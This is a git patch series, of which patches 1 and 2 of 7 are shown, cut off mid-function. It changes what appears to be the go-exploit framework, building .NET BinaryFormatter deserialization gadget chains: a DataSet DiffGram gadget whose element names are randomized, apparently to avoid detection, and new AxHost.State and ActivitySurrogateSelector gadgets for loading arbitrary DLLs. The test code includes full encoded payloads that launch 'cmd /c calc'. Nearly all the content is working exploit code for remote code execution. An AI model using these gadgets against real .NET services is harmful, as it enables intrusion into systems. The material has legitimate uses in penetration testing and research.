From 38102269acec037c636ff75cf1bb095d2f3f281b Mon Sep 17 00:00:00 2001
From: lobsterjerusalem <work@nday.dev>
Date: Wed, 23 Jul 2025 19:17:48 -0600
Subject: [PATCH 1/7] randomized values in payload name fields, also removed
 test since randomized values broke that

---
 dotnet/dotnetgadget.go      | 24 ++++++++++++++----------
 dotnet/dotnetgadget_test.go |  7 -------
 2 files changed, 14 insertions(+), 17 deletions(-)

diff --git a/dotnet/dotnetgadget.go b/dotnet/dotnetgadget.go
index 9d0ca34..a1f161a 100644
--- a/dotnet/dotnetgadget.go
+++ b/dotnet/dotnetgadget.go
@@ -41,6 +41,7 @@ import (
 	"path/filepath"
 
 	"github.com/vulncheck-oss/go-exploit/output"
+	"github.com/vulncheck-oss/go-exploit/random"
 	"github.com/vulncheck-oss/go-exploit/transform"
 )
 
@@ -109,14 +110,17 @@ func IsValidXML(data []byte) bool {
 }
 
 func CreateDataSetXMLDiffGram(program string, args string) (string, bool) {
-	string0 := `<xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="dataset0">
-                <xs:element name="dataset0" msdata:IsDataSet="true" msdata:UseCurrentLocale="true">
+	name0 := random.RandLettersRange(3, 9)
+	name1 := random.RandLettersRange(3, 9)
+	name2 := random.RandLettersRange(3, 9)
+	string0 := `<xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="` + name0 + `">
+                <xs:element name="` + name0 + `" msdata:IsDataSet="true" msdata:UseCurrentLocale="true">
                     <xs:complexType>
                         <xs:choice minOccurs="0" maxOccurs="unbounded">
-                            <xs:element name="element0">
+                            <xs:element name="` + name1 + `">
                                 <xs:complexType>
                                     <xs:sequence>
-                                        <xs:element name="element1" msdata:DataType="System.Collections.Generic.List` + "`" + `1[[System.Data.Services.Internal.ExpandedWrapper` + "`" + `2[[System.Web.UI.LosFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" type="xs:anyType" minOccurs="0"/>
+                                        <xs:element name="` + name2 + `" msdata:DataType="System.Collections.Generic.List` + "`" + `1[[System.Data.Services.Internal.ExpandedWrapper` + "`" + `2[[System.Web.UI.LosFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" type="xs:anyType" minOccurs="0"/>
                                     </xs:sequence>
                                 </xs:complexType>
                             </xs:element>
@@ -134,9 +138,9 @@ func CreateDataSetXMLDiffGram(program string, args string) (string, bool) {
 	innerTypeConfuseDelegateBase64 := string(b64String)
 
 	string1 := `<diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">
-                <dataset0>
-                    <element0 diffgr:id="Table" msdata:rowOrder="0" diffgr:hasChanges="inserted">
-                        <element1 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
+                <` + name0 + `>
+                    <` + name1 + ` diffgr:id="Table" msdata:rowOrder="0" diffgr:hasChanges="inserted">
+                        <` + name2 + ` xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
                             <ExpandedWrapperOfLosFormatterObjectDataProvider xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" >
                                 <ExpandedElement/>
                                 <ProjectedProperty0>
@@ -147,9 +151,9 @@ func CreateDataSetXMLDiffGram(program string, args string) (string, bool) {
                                     <ObjectInstance xsi:type="LosFormatter"></ObjectInstance>
                                 </ProjectedProperty0>
                             </ExpandedWrapperOfLosFormatterObjectDataProvider>
-                        </element1>
-                    </element0>
-                </dataset0>
+                        </` + name2 + `>
+                    </` + name1 + `>
+                </` + name0 + `>
             </diffgr:diffgram>`
 	libraryID := 2
 	binaryLibrary := BinaryLibraryRecord{ID: libraryID, Library: "System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"}
diff --git a/dotnet/dotnetgadget_test.go b/dotnet/dotnetgadget_test.go
index c5c6380..1a77b7b 100644
--- a/dotnet/dotnetgadget_test.go
+++ b/dotnet/dotnetgadget_test.go
@@ -149,13 +149,6 @@ func TestCreateClaimsPrincipal(t *testing.T) {
 	}
 }
 
-func TestCreateDataSetXMLDiffGram(t *testing.T) {
-	got, ok := CreateDataSetXMLDiffGram("cmd", "/c calc")
-	if !ok || fmt.Sprintf("%02x", got) != "0001000000ffffffff01000000000000000c020000004e53797374656d2e446174612c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d6237376135633536313933346530383905010000001353797374656d2e446174612e446174615365740200000009586d6c536368656d610b586d6c446966664772616d0101020000000603000000960a3c78733a736368656d6120786d6c6e733d222220786d6c6e733a78733d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d612220786d6c6e733a6d73646174613d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a786d6c2d6d7364617461222069643d226461746173657430223e0a202020202020202020202020202020203c78733a656c656d656e74206e616d653d22646174617365743022206d73646174613a4973446174615365743d227472756522206d73646174613a55736543757272656e744c6f63616c653d2274727565223e0a20202020202020202020202020202020202020203c78733a636f6d706c6578547970653e0a2020202020202020202020202020202020202020202020203c78733a63686f696365206d696e4f63637572733d223022206d61784f63637572733d22756e626f756e646564223e0a202020202020202020202020202020202020202020202020202020203c78733a656c656d656e74206e616d653d22656c656d656e7430223e0a20202020202020202020202020202020202020202020202020202020202020203c78733a636f6d706c6578547970653e0a2020202020202020202020202020202020202020202020202020202020202020202020203c78733a73657175656e63653e0a202020202020202020202020202020202020202020202020202020202020202020202020202020203c78733a656c656d656e74206e616d653d22656c656d656e743122206d73646174613a44617461547970653d2253797374656d2e436f6c6c656374696f6e732e47656e657269632e4c69737460315b5b53797374656d2e446174612e53657276696365732e496e7465726e616c2e457870616e6465645772617070657260325b5b53797374656d2e5765622e55492e4c6f73466f726d61747465722c2053797374656d2e5765622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623033663566376631316435306133615d2c5b53797374656d2e57696e646f77732e446174612e4f626a6563744461746150726f76696465722c2050726573656e746174696f6e4672616d65776f726b2c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d333162663338353661643336346533355d5d2c2053797374656d2e446174612e53657276696365732c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d5d2220747970653d2278733a616e795479706522206d696e4f63637572733d2230222f3e0a2020202020202020202020202020202020202020202020202020202020202020202020203c2f78733a73657175656e63653e0a20202020202020202020202020202020202020202020202020202020202020203c2f78733a636f6d706c6578547970653e0a202020202020202020202020202020202020202020202020202020203c2f78733a656c656d656e743e0a2020202020202020202020202020202020202020202020203c2f78733a63686f6963653e0a20202020202020202020202020202020202020203c2f78733a636f6d706c6578547970653e0a202020202020202020202020202020203c2f78733a656c656d656e743e0a2020202020202020202020203c2f78733a736368656d613e06040000009e223c6469666667723a646966666772616d20786d6c6e733a6d73646174613d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a786d6c2d6d73646174612220786d6c6e733a6469666667723d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a786d6c2d646966666772616d2d7631223e0a202020202020202020202020202020203c64617461736574303e0a20202020202020202020202020202020202020203c656c656d656e7430206469666667723a69643d225461626c6522206d73646174613a726f774f726465723d223022206469666667723a6861734368616e6765733d22696e736572746564223e0a2020202020202020202020202020202020202020202020203c656c656d656e743120786d6c6e733a7873693d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d612d696e7374616e63652220786d6c6e733a7873643d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d61223e0a202020202020202020202020202020202020202020202020202020203c457870616e646564577261707065724f664c6f73466f726d61747465724f626a6563744461746150726f766964657220786d6c6e733a7873693d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d612d696e7374616e63652220786d6c6e733a7873643d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d6122203e0a20202020202020202020202020202020202020202020202020202020202020203c457870616e646564456c656d656e742f3e0a20202020202020202020202020202020202020202020202020202020202020203c50726f6a656374656450726f7065727479303e0a2020202020202020202020202020202020202020202020202020202020202020202020203c4d6574686f644e616d653e446573657269616c697a653c2f4d6574686f644e616d653e0a2020202020202020202020202020202020202020202020202020202020202020202020203c4d6574686f64506172616d65746572733e0a202020202020202020202020202020202020202020202020202020202020202020202020202020203c616e795479706520786d6c6e733a7873693d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d612d696e7374616e63652220786d6c6e733a7873643d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d6122207873693a747970653d227873643a737472696e67223e2f774579774245414151414141502f2f2f2f38424141414141414141414177434141414153564e356333526c62537767566d567963326c76626a30304c6a41754d4334774c4342446457783064584a6c5057356c645852795957777349464231596d78705930746c6556527661325675505749334e324531597a55324d546b7a4e4755774f446b46415141414149514255336c7a644756744c6b4e766247786c593352706232357a4c6b646c626d567961574d75553239796447566b553256305944466257314e356333526c6253355464484a70626d63734947317a5932397962476c694c4342575a584a7a61573975505451754d4334774c6a417349454e3162485231636d5539626d563164484a68624377675548566962476c6a53325635564739725a573439596a63335954566a4e5459784f544d305a5441344f563164424141414141564462335675644168446232317759584a6c636764575a584a7a6157397542556c305a57317a41414d414267694e41564e356333526c62533544623278735a574e3061573975637935485a57356c636d6c6a4c6b4e7662584268636d6c7a623235446232317759584a6c636d41785731745465584e305a573075553352796157356e4c43427463324e76636d787059697767566d567963326c76626a30304c6a41754d4334774c4342446457783064584a6c5057356c645852795957777349464231596d78705930746c6556527661325675505749334e324531597a55324d546b7a4e4755774f446c6458516743414141414167414141416b44414141414167414141416b454141414142414d414141434e41564e356333526c62533544623278735a574e3061573975637935485a57356c636d6c6a4c6b4e7662584268636d6c7a623235446232317759584a6c636d41785731745465584e305a573075553352796157356e4c43427463324e76636d787059697767566d567963326c76626a30304c6a41754d4334774c4342446457783064584a6c5057356c645852795957777349464231596d78705930746c6556527661325675505749334e324531597a55324d546b7a4e4755774f446c64585145414141414c58324e7662584268636d6c7a62323444496c4e356333526c625335455a57786c5a3246305a564e6c636d6c6862476c3659585270623235496232786b5a58494a4251414141424545414141414167414141415947414141414279396a49474e6862474d474277414141414e6a625751454251414141434a5465584e305a573075524756735a576468644756545a584a7059577870656d463061573975534739735a47567941774141414168455a57786c5a3246305a5164745a58526f623251774232316c644768765a44454441774d7755336c7a644756744c6b526c6247566e5958526c55325679615746736158706864476c76626b68766247526c636974455a57786c5a3246305a55567564484a354c314e356333526c625335535a575a735a574e30615739754c6b316c62574a6c636b6c755a6d39545a584a7059577870656d463061573975534739735a4756794c314e356333526c625335535a575a735a574e30615739754c6b316c62574a6c636b6c755a6d39545a584a7059577870656d463061573975534739735a475679435167414141414a4351414141416b4b41414141424167414141417755336c7a644756744c6b526c6247566e5958526c55325679615746736158706864476c76626b68766247526c636974455a57786c5a3246305a55567564484a3542774141414152306558426c4347467a63325674596d7835426e5268636d646c64424a3059584a6e5a5852556558426c51584e7a5a57316962486b4f644746795a32563056486c775a5535686257554b625756306147396b546d46745a51316b5a57786c5a3246305a55567564484a354151454341514542417a425465584e305a573075524756735a576468644756545a584a7059577870656d463061573975534739735a4756794b30526c6247566e5958526c52573530636e6b4743774141414c414355336c7a644756744c6b5a31626d4e674d31746255336c7a644756744c6c4e30636d6c755a79776762584e6a62334a736157497349465a6c636e4e70623234394e4334774c6a41754d43776751335673644856795a5431755a585630636d46734c43425164574a7361574e4c5a586c556232746c626a31694e7a64684e574d314e6a45354d7a526c4d4467355853786255336c7a644756744c6c4e30636d6c755a79776762584e6a62334a736157497349465a6c636e4e70623234394e4334774c6a41754d43776751335673644856795a5431755a585630636d46734c43425164574a7361574e4c5a586c556232746c626a31694e7a64684e574d314e6a45354d7a526c4d4467355853786255336c7a644756744c6b52705957647562334e3061574e7a4c6c427962324e6c63334d7349464e356333526c62537767566d567963326c76626a30304c6a41754d4334774c4342446457783064584a6c5057356c645852795957777349464231596d78705930746c6556527661325675505749334e324531597a55324d546b7a4e4755774f446c645851594d414141415332317a5932397962476c694c4342575a584a7a61573975505451754d4334774c6a417349454e3162485231636d5539626d563164484a68624377675548566962476c6a53325635564739725a573439596a63335954566a4e5459784f544d305a5441344f516f474451414141456c5465584e305a57307349465a6c636e4e70623234394e4334774c6a41754d43776751335673644856795a5431755a585630636d46734c43425164574a7361574e4c5a586c556232746c626a31694e7a64684e574d314e6a45354d7a526c4d446735426734414141416155336c7a644756744c6b52705957647562334e3061574e7a4c6c427962324e6c63334d4744774141414156546447467964416b514141414142416b414141417655336c7a644756744c6c4a6c5a6d786c593352706232347554575674596d56795357356d62314e6c636d6c6862476c3659585270623235496232786b5a58494841414141424535686257554d51584e7a5a57316962486c4f5957316c43554e7359584e7a546d46745a516c546157647559585231636d554b55326c6e626d463064584a6c4d67704e5a5731695a584a556558426c4545646c626d567961574e42636d64316257567564484d4241514542415141444341315465584e305a57307556486c775a567464435138414141414a4451414141416b4f41414141426851414141412b55336c7a644756744c6b52705957647562334e3061574e7a4c6c427962324e6c63334d6755335268636e516f55336c7a644756744c6c4e30636d6c755a79776755336c7a644756744c6c4e30636d6c755a796b47465141414144355465584e305a57307552476c685a3235766333527059334d7555484a765932567a63794254644746796443685465584e305a573075553352796157356e4c43425465584e305a573075553352796157356e4b5167414141414b41516f414141414a41414141426859414141414851323974634746795a516b4d41414141426867414141414e55336c7a644756744c6c4e30636d6c755a77595a414141414b306c7564444d7949454e7662584268636d556f55336c7a644756744c6c4e30636d6c755a79776755336c7a644756744c6c4e30636d6c755a796b474767414141444a5465584e305a573075535735304d7a496751323974634746795a53685465584e305a573075553352796157356e4c43425465584e305a573075553352796157356e4b5167414141414b415241414141414941414141426873414141427855336c7a644756744c6b4e7662584268636d6c7a623235674d56746255336c7a644756744c6c4e30636d6c755a79776762584e6a62334a736157497349465a6c636e4e70623234394e4334774c6a41754d43776751335673644856795a5431755a585630636d46734c43425164574a7361574e4c5a586c556232746c626a31694e7a64684e574d314e6a45354d7a526c4d4467355856304a4441414141416f4a4441414141416b5941414141435259414141414b43773d3d3c2f616e79547970653e0a2020202020202020202020202020202020202020202020202020202020202020202020203c2f4d6574686f64506172616d65746572733e0a2020202020202020202020202020202020202020202020202020202020202020202020203c4f626a656374496e7374616e6365207873693a747970653d224c6f73466f726d6174746572223e3c2f4f626a656374496e7374616e63653e0a20202020202020202020202020202020202020202020202020202020202020203c2f50726f6a656374656450726f7065727479303e0a202020202020202020202020202020202020202020202020202020203c2f457870616e646564577261707065724f664c6f73466f726d61747465724f626a6563744461746150726f76696465723e0a2020202020202020202020202020202020202020202020203c2f656c656d656e74313e0a20202020202020202020202020202020202020203c2f656c656d656e74303e0a202020202020202020202020202020203c2f64617461736574303e0a2020202020202020202020203c2f6469666667723a646966666772616d3e0b" {
-		t.Fatalf("Invalid CreateDataSetXMLDiffGram output... val: %q hexform: %02x\n", got, got)
-	}
-}
-
 func TestCreateCreateDataSetTypeSpoof(t *testing.T) {
 	got, ok := CreateDataSetTypeSpoof("cmd", "/c calc", "BinaryFormatter")
 	if !ok || fmt.Sprintf("%02x", got) != "0001000000ffffffff01000000000000000c02000000086d73636f726c69620c030000004e53797374656d2e446174612c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d6237376135633536313933346530383905010000006353797374656d2e446174612e446174615365742c2053797374656d2e446174612c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038390a00000016446174615365742e52656d6f74696e67466f726d617413446174615365742e446174615365744e616d6511446174615365742e4e616d6573706163650e446174615365742e50726566697815446174615365742e4361736553656e73697469766512446174615365742e4c6f63616c654c4349441a446174615365742e456e666f726365436f6e73747261696e74731a446174615365742e457874656e64656450726f7065727469657314446174615365742e5461626c65732e436f756e7410446174615365742e5461626c65735f30040101010000000200071f53797374656d2e446174612e53657269616c697a6174696f6e466f726d61740300000001080108020200000005fcffffff1f53797374656d2e446174612e53657269616c697a6174696f6e466f726d6174010000000776616c75655f5f00080300000001000000060500000000090500000009050000000009040000000a0100000009060000000f06000000d0020000020001000000ffffffff01000000000000000c020000005e4d6963726f736f66742e506f7765725368656c6c2e456469746f722c2056657273696f6e3d332e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d333162663338353661643336346533350501000000424d6963726f736f66742e56697375616c53747564696f2e546578742e466f726d617474696e672e54657874466f726d617474696e6752756e50726f70657274696573010000000f466f726567726f756e64427275736801020000000603000000f2033c5265736f7572636544696374696f6e61727920786d6c6e733d22687474703a2f2f736368656d61732e6d6963726f736f66742e636f6d2f77696e66782f323030362f78616d6c2f70726573656e746174696f6e2220786d6c6e733a583d22687474703a2f2f736368656d61732e6d6963726f736f66742e636f6d2f77696e66782f323030362f78616d6c2220786d6c6e733a533d22636c722d6e616d6573706163653a53797374656d3b617373656d626c793d6d73636f726c69622220786d6c6e733a443d22636c722d6e616d6573706163653a53797374656d2e446961676e6f73746963733b617373656d626c793d73797374656d223e3c4f626a6563744461746150726f766964657220583a4b65793d2222204f626a656374547970653d227b583a5479706520443a50726f636573737d22204d6574686f644e616d653d225374617274223e3c4f626a6563744461746150726f76696465722e4d6574686f64506172616d65746572733e3c533a537472696e673e636d643c2f533a537472696e673e3c533a537472696e673e2f632063616c633c2f533a537472696e673e3c2f4f626a6563744461746150726f76696465722e4d6574686f64506172616d65746572733e3c2f4f626a6563744461746150726f76696465723e3c2f5265736f7572636544696374696f6e6172793e0b0b" {

From f6dc5607ce1afa539e3c0e50b733a4e8518b8b84 Mon Sep 17 00:00:00 2001
From: lobsterjerusalem <work@nday.dev>
Date: Fri, 25 Jul 2025 02:39:58 -0600
Subject: [PATCH 2/7] Not yet working but almost there, just saving progress
 for now

---
 dotnet/dotnetgadget.go      | 968 ++++++++++++++++++++++++++++++++++--
 dotnet/dotnetgadget_test.go |  10 +
 dotnet/general_types.go     |  32 +-
 dotnet/records.go           | 167 +++++++
 4 files changed, 1138 insertions(+), 39 deletions(-)

diff --git a/dotnet/dotnetgadget.go b/dotnet/dotnetgadget.go
index a1f161a..973c7c3 100644
--- a/dotnet/dotnetgadget.go
+++ b/dotnet/dotnetgadget.go
@@ -109,6 +109,926 @@ func IsValidXML(data []byte) bool {
 	return xml.Unmarshal(data, new(interface{})) == nil
 }
 
+func CreateAxHostStateDLL(program string, args string) (string, bool) {
+	binaryLibrary := BinaryLibraryRecord{ID: 2, Library: "System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"}
+	className := "System.Windows.Forms.AxHost+State"
+	memberNames := []string{"PropertyBagBinary"}
+	additionalInfo := []interface{}{PrimitiveTypeEnum["PrimitiveArray"]}
+	memberValues := []interface{}{MemberReferenceRecord{IDRef: 3}}
+	memberTypes := []string{
+		"Object",
+	}
+
+	innerNewGadget, ok := CreateDLLReflection([]byte("nonsense-placeholder"))
+	if !ok {
+		return "", false
+	}
+
+	//  the member here is going to be yet another gadget, should be around 0xc7 37 00 00
+	arraySinglePrimitiveRecord := ArraySinglePrimitiveRecord{
+		PrimitiveTypeEnum: PrimitiveTypeEnum["Byte"],
+		ArrayInfo:         ArrayInfo{ObjectID: 3, MemberCount: len(innerNewGadget)},
+		Members:           string([]byte(innerNewGadget)),
+	}
+
+	classInfo := ClassInfo{ObjectID: 1, Name: className, MemberCount: len(memberNames), MemberNames: memberNames}
+	memberTypeInfo, ok := getMemberTypeInfo(memberTypes, memberNames, additionalInfo)
+	if !ok {
+		return "", false
+	}
+
+	classWithMembersAndTypes := ClassWithMembersAndTypesRecord{ClassInfo: classInfo, LibraryID: 2, MemberTypeInfo: memberTypeInfo, MemberValues: memberValues, BinaryLibrary: binaryLibrary}
+
+	// FINALIZE
+	serializationHeaderRecord := SerializationHeaderRecord{RootID: 1, HeaderID: -1}
+	serializationHeaderRecordString, _ := serializationHeaderRecord.ToRecordBin()
+	binLibString, _ := binaryLibrary.ToRecordBin()
+	classWithMembersAndTypesString, ok := classWithMembersAndTypes.ToRecordBin()
+	if !ok {
+		return "", false
+	}
+	arraySinglePrimitiveRecordString, ok := arraySinglePrimitiveRecord.ToRecordBin()
+	if !ok {
+		return "", false
+	}
+
+	payload := serializationHeaderRecordString + binLibString + classWithMembersAndTypesString + arraySinglePrimitiveRecordString + string(byte(RecordTypeEnumMap["MessageEnd"]))
+	return payload, true
+}
+
+func CreateDLLReflection(DLLBytes []byte) (string, bool) {
+	// This one is so large that it makes more sense to just build the "final" gadget as we go, so that's what is going to happen with this one.
+	var finalGadget string
+	var records []Record
+
+	serializationHeaderRecord := SerializationHeaderRecord{RootID: 1, HeaderID: -1}
+	records = append(records, serializationHeaderRecord)
+
+	// SCWMT OBJECTID 1
+	binaryLibrary := BinaryLibraryRecord{ID: 2, Library: "System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"}
+	memberNames := []string{"_items", "_size", "_version"}
+	memberTypeInfo, ok := getMemberTypeInfo([]string{"ObjectArray", "Primitive", "Primitive"}, memberNames, []interface{}{PrimitiveTypeEnum["Int32"], PrimitiveTypeEnum["Int32"]})
+	if !ok {
+		return "", false
+	}
+	systemClassWithMembersAndTypesID1 := SystemClassWithMembersAndTypesRecord{
+		ClassInfo: ClassInfo{
+			ObjectID:    1,
+			Name:        "System.Collections.Generic.List`1[[System.Object, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]",
+			MemberCount: len(memberNames),
+			MemberNames: memberNames,
+		},
+		MemberTypeInfo: memberTypeInfo,
+		MemberValues: []interface{}{
+			MemberReferenceRecord{IDRef: 2},
+			PrimitiveInt32(0x0a),
+			PrimitiveInt32(0x0a),
+		},
+	}
+	records = append(records, systemClassWithMembersAndTypesID1)
+
+	// ASO OBJ 2
+	var arraySingleObjectMemberValues []interface{}
+
+	/// Building inner types for the array
+	// E  | objectid    | BT |   RANK      |Lengths      | TE | AdditionalInfo
+	// 07 | 03 00 00 00 | 01 | 01 00 00 00 | 01 00 00 00 | 07 | 02
+	binaryArrayRecord := BinaryArrayRecord{
+		ObjectID:            3,
+		BinaryArrayTypeEnum: 1, // 1byte
+		Rank:                1, // >=0
+		Lengths:             []int{1},
+		TypeEnum:            BinaryTypeEnumerationMap["PrimitiveArray"], // 1byte
+		AdditionalTypeInfo:  []interface{}{PrimitiveTypeEnum["Byte"]},
+	}
+
+	// binlib
+	binaryLibrary1 := BinaryLibraryRecord{ID: 14, Library: "System.Workflow.ComponentModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"}
+
+	// InnerClassValue
+	memberTypeInfoID4, ok := getMemberTypeInfo([]string{"SystemClass", "ObjectArray"}, []string{"type", "memberDatas"}, []interface{}{"System.UnitySerializationHolder"})
+	if !ok {
+		return "", false
+	}
+
+	classWithMembersAndTypesID4 := ClassWithMembersAndTypesRecord{
+		ClassInfo: ClassInfo{
+			ObjectID:    4,
+			Name:        "System.Workflow.ComponentModel.Serialization.ActivitySurrogateSelector+ObjectSurrogate+ObjectSerializedRef",
+			MemberNames: []string{"type", "memberDatas"},
+		},
+		MemberTypeInfo: memberTypeInfoID4,
+		LibraryID:      14,
+		MemberValues:   []interface{}{MemberReferenceRecord{IDRef: 0x0f}, MemberReferenceRecord{IDRef: 0x10}},
+		BinaryLibrary:  binaryLibrary,
+	}
+
+	// ClassWithIDRecord O5
+	classWithIDRecordID5 := ClassWithIDRecord{
+		ObjectID:     5,
+		MetadataID:   4,
+		MemberValues: []interface{}{MemberReferenceRecord{IDRef: 17}, MemberReferenceRecord{IDRef: 18}},
+	}
+
+	// Add value types to create/finish this ASO record
+	arraySingleObjectMemberValues = append(arraySingleObjectMemberValues, MemberReferenceRecord{IDRef: 0x3})
+	arraySingleObjectMemberValues = append(arraySingleObjectMemberValues, MemberReferenceRecord{IDRef: 0x4})
+	arraySingleObjectMemberValues = append(arraySingleObjectMemberValues, MemberReferenceRecord{IDRef: 0x5})
+	arraySingleObjectMemberValues = append(arraySingleObjectMemberValues, MemberReferenceRecord{IDRef: 0x6})
+	arraySingleObjectMemberValues = append(arraySingleObjectMemberValues, MemberReferenceRecord{IDRef: 0x7})
+	arraySingleObjectMemberValues = append(arraySingleObjectMemberValues, MemberReferenceRecord{IDRef: 0x8})
+	arraySingleObjectMemberValues = append(arraySingleObjectMemberValues, MemberReferenceRecord{IDRef: 0x9})
+	arraySingleObjectMemberValues = append(arraySingleObjectMemberValues, MemberReferenceRecord{IDRef: 0x0a})
+	arraySingleObjectMemberValues = append(arraySingleObjectMemberValues, MemberReferenceRecord{IDRef: 0x0b})
+	arraySingleObjectMemberValues = append(arraySingleObjectMemberValues, MemberReferenceRecord{IDRef: 0x0c})
+	arraySingleObjectMemberValues = append(arraySingleObjectMemberValues, ObjectNullMultiple256Record{NullCount: 6})
+	arraySingleObjectMemberValues = append(arraySingleObjectMemberValues, binaryArrayRecord)
+	arraySingleObjectMemberValues = append(arraySingleObjectMemberValues, MemberReferenceRecord{IDRef: 0x0d})
+	arraySingleObjectMemberValues = append(arraySingleObjectMemberValues, binaryLibrary1)
+	arraySingleObjectMemberValues = append(arraySingleObjectMemberValues, classWithMembersAndTypesID4)
+	arraySingleObjectMemberValues = append(arraySingleObjectMemberValues, classWithIDRecordID5)
+
+	// Create the ASO and add to records
+	arraySingleObjectRecordID2 := ArraySingleObjectRecord{ArrayInfo: ArrayInfo{ObjectID: 2, MemberCount: 0x10}, Members: arraySingleObjectMemberValues}
+	records = append(records, arraySingleObjectRecordID2)
+
+	// ClassWithIDRecord O6
+	classWithIDRecordID6 := ClassWithIDRecord{
+		ObjectID:     6,
+		MetadataID:   4,
+		MemberValues: []interface{}{MemberReferenceRecord{IDRef: 19}, MemberReferenceRecord{IDRef: 20}},
+	}
+	records = append(records, classWithIDRecordID6)
+
+	// ClassWithIDRecord O7
+	classWithIDRecordID7 := ClassWithIDRecord{
+		ObjectID:     7,
+		MetadataID:   4,
+		MemberValues: []interface{}{MemberReferenceRecord{IDRef: 21}, MemberReferenceRecord{IDRef: 22}},
+	}
+	records = append(records, classWithIDRecordID7)
+
+	// ClassWithIDRecord O8
+	classWithIDRecordID8 := ClassWithIDRecord{
+		ObjectID:     8,
+		MetadataID:   4,
+		MemberValues: []interface{}{MemberReferenceRecord{IDRef: 23}, MemberReferenceRecord{IDRef: 24}},
+	}
+	records = append(records, classWithIDRecordID8)
+
+	// ClassWithIDRecord O9
+	classWithIDRecordID9 := ClassWithIDRecord{
+		ObjectID:     9,
+		MetadataID:   4,
+		MemberValues: []interface{}{MemberReferenceRecord{IDRef: 25}, MemberReferenceRecord{IDRef: 26}},
+	}
+	records = append(records, classWithIDRecordID9)
+
+	// ClassWithIDRecord O10
+	classWithIDRecordID10 := ClassWithIDRecord{
+		ObjectID:     10,
+		MetadataID:   4,
+		MemberValues: []interface{}{MemberReferenceRecord{IDRef: 27}, MemberReferenceRecord{IDRef: 28}},
+	}
+	records = append(records, classWithIDRecordID10)
+
+	// ClassWithIDRecord O11
+	classWithIDRecordID11 := ClassWithIDRecord{
+		ObjectID:     11,
+		MetadataID:   4,
+		MemberValues: []interface{}{MemberReferenceRecord{IDRef: 29}, MemberReferenceRecord{IDRef: 30}},
+	}
+	records = append(records, classWithIDRecordID11)
+
+	// SystemClassWithMembersAndTypesID12
+	ID12MemberNames := []string{"LoadFactor", "Version", "Comparer", "HashCodeProvider", "HashSize", "Keys", "Values"}
+	ID12MemberTypeInfo, ok := getMemberTypeInfo([]string{"Primitive", "Primitive", "SystemClass", "SystemClass", "Primitive", "ObjectArray", "ObjectArray"}, ID12MemberNames, []interface{}{
+		PrimitiveTypeEnum["Single"],
+		PrimitiveTypeEnum["Int32"],
+		"System.Collections.IComparer",
+		"$System.Collections.IHashCodeProvider",
+		PrimitiveTypeEnum["Int32"],
+	})
+	if !ok {
+		return "", false
+	}
+	systemClassWithMembersAndTypesID12 := SystemClassWithMembersAndTypesRecord{
+		ClassInfo: ClassInfo{
+			ObjectID:    12,
+			Name:        "System.Collection.Hashtable",
+			MemberCount: len(ID12MemberNames),
+			MemberNames: ID12MemberNames,
+		},
+		MemberTypeInfo: ID12MemberTypeInfo,
+		MemberValues: []interface{}{
+			PrimitiveByteString("\xec\x51\x38\x3f"), // This is the 'Single' type
+			PrimitiveInt32(2),
+			ObjectNullRecord{},
+			ObjectNullRecord{},
+			PrimitiveInt32(3),
+			MemberReferenceRecord{IDRef: 0x1f},
+			MemberReferenceRecord{IDRef: 0x20},
+		},
+	}
+	records = append(records, systemClassWithMembersAndTypesID12)
+
+	// ASP ID 13
+	arraySinglePrimitiveID13 := ArraySinglePrimitiveRecord{
+		ArrayInfo:         ArrayInfo{ObjectID: 13, MemberCount: len(DLLBytes)},
